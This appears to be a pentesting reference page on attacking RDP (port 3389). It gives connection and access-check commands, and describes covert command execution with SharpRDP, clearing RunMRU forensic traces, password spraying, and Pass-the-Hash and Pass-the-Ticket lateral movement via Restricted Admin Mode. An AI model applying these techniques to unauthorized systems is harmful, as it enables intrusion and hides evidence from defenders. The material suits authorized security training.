search

3389 - RDP

Remote Desktop Protocol (RDP) is a network communication protocol developed by Microsoft that allows us to connect to and control a computer from another location over a network or the internet. It provides a graphical interface so we can view the remote system’s desktop and use its applications as if we were physically present. RDP is commonly used to support remote working, technical support, and the management of servers and workstations without requiring physical access.

By default, RDP access is typically restricted to members of the local Administratorsarrow-up-right group and users who are added to the Remote Desktop Usersarrow-up-right group on the system.

hashtag
Connect

We can check for RDP access over a network from a Linux host with nxcarrow-up-right:

# Access check
nxc rdp 10.120.220.0/24 -u x7331 -p 'P@ssword123!' -d batman.local

Once we have a target host, we can directly connect using tools like xfreerdparrow-up-right and remminaarrow-up-right.

circle-info

CTRL+ALT+ENTER toggles the fulll screen with xfreerdp.

# Connect
xfreerdp /u:x7331 /p:'P@assword123!' /d:batman.local /v:10.120.220.10 +drives /clipboard < /dynamic-resolution /f | /smart-sizing >

# Share the local_dir file (must exist in pwd) as a share in RDP
xfreerdp /u:x7331 /p:'P@assword123!' /v:10.120.220.10 /drive:local_dir,share

# For slow connections
xfreerdp /u:x7331 /p:'P@assword123!' /v:10.120.220.10 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache

# Clear cert cache
rm ~/.config/freerdp/known_hosts
rm ~/.config/freerdp/server/*.pem

# Launch remmina
remmina

From a Windows host we can use mstscarrow-up-right (Microsoft Terminal Services Client) or SharpRDParrow-up-right. The latter is used for more covert operations, as instead of launching a visible desktop session, it establishes an authenticated RDP connection in the background and execute commands remotely.

SharpRDP leaves traces of command execution within the RunMRUarrow-up-right registry key, but we can use CleanRunMRUarrow-up-right to clean all command records. To compile the tool, we can use the built-in Microsoft cscarrow-up-right compiler tool.

circle-info

The RunMRU (Most Recently Used) registry key in Windows which stores the last 26 commands entered via the Win+R Run dialog. It is a critical, per-user forensic artifact used to track executed programs and scripts.

hashtag
Attacks

hashtag
Connection Files

Check for connection details within .rdp files.

hashtag
Password Spraying

We can perform a password spray attack with nxc or hydraarrow-up-right.

hashtag
Lateral Movement (Restricted Admin Mode)

Restricted Admin Mode is a security feature introduced by Microsoft to reduce the risk of credential theft during RDP sessions. Under normal circumstances, when we connect to a remote system using RDP, the logon is treated as an interactive session. Restricted Admin Mode changes this behaviour by performing a network logon instead.

circle-info

An interactive logon provides full credentials to the remote system, which means reusable authentication material like NTLM hashes or Kerberos tickets may be stored in memory and exposed if the host is compromised.

In contrast, a network logon does not store reusable credentials on the target system, which reduces the risk of credential theft. However, this type of logon allows authentication using only NTLM hashes or Kerberos tickets rather than requiring the user’s password.

However, this protection introduces an important trade-off. Because the remote system does not require reusable credentials, authentication can occur using only NTLM hashes or Kerberos tickets. As a result, attackers who possess a stolen hash or ticket can authenticate to remote systems without knowing the user’s password. This enables techniques such as Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) for lateral movement over RDP when Restricted Admin Mode is enabled.

This mode is generally limited to accounts with administrative privileges, such as local or domain administrators, since the remote system relies on the existing security context rather than creating a full credential session. In domain environments, members of the Domain Admins group often have local administrator rights on domain-joined systems by default, allowing them to use this feature unless restricted through policy.

Feature
Interactive Logon
Network Logon

Password required

Yes

Not required if hash/ticket available

NTLM hash allowed

No

Yes (PtH)

Kerberos ticket allowed

No

Yes (PtT)

Credential caching on remote host

Stored in memory

Not cached

Typical use

Standard RDP / console logon

Restricted Admin Mode / remote network authentication

Admin accounts required

Optional

Must be admin on target

We can check if Restricted Admin Mode is enabled by querying the registry with regarrow-up-right:

hashtag
Pass-the-Hash

We can perform a PtH attack from Linux using xfreerdp.

hashtag
Pass-the-Ticket

For the PtT attack, we can use rubeusarrow-up-right and mstsc from a Windows host:

  1. Create a sacrificial process to generate a new and isolated logon session that is separate from the current user context. In this way, Kerberos tickets can be injected without affecting the existing credentials.

  2. Use the rc4 value (NTLM hash) not for direct authentication, but to request a TGT from the DC.

  3. Inject the TGT into memory and used it for subsequent authentication.

Previous135 - WMINext5900 - VNC

Last updated